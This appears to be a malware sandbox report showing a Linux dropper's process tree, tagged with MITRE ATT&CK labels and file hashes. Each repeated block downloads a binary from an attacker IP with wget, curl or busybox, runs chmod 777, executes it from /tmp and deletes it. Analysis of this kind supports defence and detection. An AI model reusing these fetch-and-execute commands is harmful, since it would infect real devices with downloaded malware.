/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:1653
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:1656
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:1659
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:1662
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:1665
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:1668
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:1669
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:1671
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:1674
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:1675
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Writes file to tmp directory
PID:1676
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:1677
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:1679
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:1680
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:1681
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Writes file to tmp directory
PID:1682
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:1683
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:1684
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:1685
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:1686
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:1687
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Writes file to tmp directory
PID:1688
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:1689
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:1690
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:1691
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:1692
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97